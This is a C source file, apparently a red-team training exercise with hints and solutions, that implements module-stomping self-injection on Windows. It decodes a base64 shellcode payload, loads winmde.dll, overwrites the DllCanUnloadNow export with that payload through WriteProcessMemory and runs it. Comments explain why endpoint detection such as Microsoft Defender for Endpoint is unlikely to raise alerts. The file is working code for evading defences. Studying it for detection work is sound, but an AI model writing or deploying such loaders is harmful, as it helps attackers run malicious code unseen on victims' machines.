#include <windows.h>
#include <psapi.h>
#include <TlHelp32.h>
#include "sc.h"
#include <stdio.h>

#define EXPORTEDFUNCTION "DllCanUnloadNow"
#define DLLPATH L"C:\\windows\\system32\\winmde.dll"
#define DLLNAME "winmde.dll"

#define DEBUG(x, ...) printf(x, ##__VA_ARGS__)

// The encoding table used by the base64
static char encoding_table[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
                                'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
                                'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
                                'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
                                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
                                'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
                                'w', 'x', 'y', 'z', '0', '1', '2', '3',
                                '4', '5', '6', '7', '8', '9', '+', '/' };
static char* decoding_table = NULL;

// Build the decoding table that will be used by the base64_decode function
void build_decoding_table() {

    decoding_table = (char*)malloc(256);
    if (decoding_table == NULL) {
        DEBUG("[x] Cannot allocate memory for the decoding table\n");
        exit(-1);
    }
    for (int i = 0; i < 64; i++) {
        decoding_table[(unsigned char)encoding_table[i]] = i;
    }
}

/****************************************************************/
/* This function is used to debase64 a string                   */
/* base64_decode(sc, sc_length, &szOutput);                     */
/****************************************************************/
unsigned char* base64_decode(const char* data, size_t input_length, size_t* output_length) {

    if (decoding_table == NULL) build_decoding_table();

    if (input_length % 4 != 0) return NULL;

    *output_length = input_length / 4 * 3;
    if (data[input_length - 1] == '=') {
        (*output_length)--;
    }
    if (data[input_length - 2] == '=') (*output_length)--;

    unsigned char* decoded_data = (unsigned char*)malloc(*output_length);
    if (decoded_data == NULL) return NULL;

    for (int i = 0, j = 0; i < input_length;) {

        DWORD sextet_a = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];
        DWORD sextet_b = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];
        DWORD sextet_c = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];
        DWORD sextet_d = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];

        DWORD triple = (sextet_a << 3 * 6)
            + (sextet_b << 2 * 6)
            + (sextet_c << 1 * 6)
            + (sextet_d << 0 * 6);

        if (j < *output_length) decoded_data[j++] = (triple >> 2 * 8) & 0xFF;
        if (j < *output_length) decoded_data[j++] = (triple >> 1 * 8) & 0xFF;
        if (j < *output_length) decoded_data[j++] = (triple >> 0 * 8) & 0xFF;
    }

    return decoded_data;
}

int main(void){
    /*************************************************************/
    /* The goal is to implement a self injector that will load a */
    /* new DLL in its process and write a malicious payload in a */
    /* given function in the DLL and then execute it             */
    /*************************************************************/

    // First Step: Retrieve the payload
    // Hints : Use one of the technique used in step 1
    buildsc();
    size_t szOutput;
    unsigned char* scBytes = base64_decode(sc, sc_length, &szOutput);
	if (szOutput == 0) {
		DEBUG("[x] Base64 decode failed \n");
		return -1;
	}
    int scLength = szOutput;
    



    // Second Step: Load the DLL in the process
    // Hints : LoadLibraryW is an interesting function
    // Hands on : Check in process hacker if the DLL has been well injected
    //            Look at the allocated memory step, what is different compared to a
    //            standard VirtualAlloc ?
    // Solution : You can see the process DLL in the "Modules" tab. You will se the WinMDE dll.
    //            If you look at the "Memory" tab, you will see several new section generated for WinMDE.
    //            Unlike the ones generated by VirtualAlloc, these sections are "backed" by the system.
    //            They have a legit use and the system think it is only used to store WinMDE DLL data.
    //            EDR are less likely to investigate behavior coming from this memory region as it is
    //            performed by a legit DLL.
    system("PAUSE");
    HANDLE dllAddress = LoadLibraryW(DLLPATH);

    system("PAUSE");
    



    // Third Step: Retrieve the function address
    // Hints: GetProcAddress should do the job
    // Hands on : Find with PEBear an interesting function that can be stomped
    // Solution : Looking at SectionHdrs tab, it is possible to see that the .text section is huge
    //            so we have plenty of space to write our payload. The best way is to write it at the
    //            beginning of the .text section.
    //            The Exports table shows that the first function is DLLCanUnloadNow. Looking at the
    //            address of this function shows that it has enough space to write our payload from it.
    //            So the function DLLCanUnloadNow will be the function stomped.
    PVOID functionAddress = GetProcAddress(dllAddress, EXPORTEDFUNCTION);
    DEBUG("[+] Payload written at %p\n", functionAddress);



    // Fourth Step: Stomp the function with the malicious payload
    // Hints: WriteProcessMemory should be ok
    DWORD sz;
    BOOL status = WriteProcessMemory((HANDLE)-1, functionAddress, scBytes, scLength * sizeof(BYTE), &sz);
	if (!status) {
		DEBUG("[x] Cannot write process memory : %d\n", GetLastError());
		return -1;
	}

    // Fifth Step: Call the function
    // Hints: Cast the address to a function pointer ((void(*)())functionAddress)();
    // Hands on: Set un breakpoint on the injected process and look from where the code is executed
    // Solution: On ProcessHacker, in the threadstack you will see that the code is executed from WinMDE.DLL
    //           and not a random memory region.
    ((void(*)())functionAddress)();

    
    /****************************************************************/
    /*                          MDE                                 */
    /****************************************************************/
	// MDE should not raise any alert about anomalous memory allocation cause for two reason. The first
	// one is because the allocation has been performed directly from the process. We are not in the case
	// of a process injection but only self-injection. The second reason is because the main allocation 
	// has not been performed by directly calling VirtualAlloc but through LoadLibrary. The additional 
	// memory allocation performed with VirtualAlloc are less than 4Kb. Usually EDRs do not raise alerts
	// for such allocation.

	// You should neither see any alert related to thread creation as the function is called directly
    // from the process using a function pointer. No CreateRemoteThread call has been performed.
    // This technique only work for self injection and cannot be used in process injection. 
}